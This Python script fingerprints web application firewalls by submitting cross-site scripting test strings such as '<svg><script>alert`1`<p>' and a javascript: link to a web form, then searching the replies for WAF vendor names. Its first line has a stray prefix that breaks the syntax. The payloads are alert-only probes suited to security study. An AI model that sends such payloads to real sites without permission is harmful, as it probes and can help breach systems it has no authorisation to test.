- import mechanize as mec
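# WAF fingerprinting demo: submit a few fixed test strings to one form and
# look for vendor names in the page that comes back.
#
# Reading the results: detection is a plain substring search on the response
# body. "No Firewall Present" therefore only means that none of the marker
# strings below appeared in the body; a filter with a custom or silent block
# page would be reported the same way.
#
# `mec` is the `mechanize` alias from the file's import line.

TARGET_URL = "http://check.cyberpersons.com/crossSiteCheck.html"
FORM_NAME = 'waf'
FIELD_NAME = 'data'
SEPARATOR = "---------------------------------------------------"

# (marker searched for in the body, message printed), in the order checked.
# The original chain tested 'Mod_Security' twice; the second branch could
# never run, so it is listed once here.
WAF_MARKERS = (
    ('WebKnight', "Firewall detected: WebKnight"),
    ('Mod_Security', "Firewall detected: Mod Security"),
    ('dotDefender', "Firewall detected: Dot Defender"),
)

NO_MATCH_MESSAGE = "No Firewall Present"


def identify_firewall(body):
    """Return the message for the first WAF marker found in *body*.

    *body* is the response text. A bytes object (what a Python 3 HTTP read
    returns) is decoded as latin-1 first so the substring search cannot
    raise on a str/bytes mismatch. Returns "No Firewall Present" when no
    marker occurs.
    """
    if isinstance(body, bytes) and not isinstance(body, str):
        body = body.decode("latin-1")
    for marker, message in WAF_MARKERS:
        if marker in body:
            return message
    return NO_MATCH_MESSAGE


def submit_value(value):
    """Submit *value* in the 'data' field of the 'waf' form; return the body.

    A new Browser is created for every submission, as in the original
    script, so no cookies or history carry over between requests.
    """
    browser = mec.Browser()
    browser.open(TARGET_URL)
    browser.select_form(FORM_NAME)
    browser.form[FIELD_NAME] = value
    browser.submit()
    return browser.response().read()


def main():
    """Run the three stages of the script in their original order."""
    # Stage 1: one test string; show the raw response and the verdict.
    crossSiteScriptingPayLoad = "<svg><script>alert`1`<p>"
    response = submit_value(crossSiteScriptingPayLoad)
    print(response)
    print(identify_firewall(response))

    # Stage 2: three more test strings; only the verdict is printed.
    listofPayloads = ['<dialog open="" onclose="alert(1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg><script>prompt( 1)<i>', '<a href="javascript:alert(1)">CLICK ME<a>']
    for payLoads in listofPayloads:
        response = submit_value(payLoads)
        print(SEPARATOR)
        print(identify_firewall(response))
        print(SEPARATOR)

    # Stage 3: a harmless tag written three ways; the raw response is shown
    # so the reader can see how the form echoes it back.
    # NOTE(review): these are ordinary (non-raw) string literals, so Python
    # processes the escapes before anything is sent. '\x3cb\x3e' is the same
    # value as '<b>', and under Python 3 '\u003cb\u003e' is as well, so the
    # entries may not be distinct test cases on the wire.
    listofPayloads = ['<b>','\u003cb\u003e','\x3cb\x3e']
    for payLoads in listofPayloads:
        response = submit_value(payLoads)
        print(SEPARATOR)
        print(response)
        print(SEPARATOR)


if __name__ == "__main__":
    main()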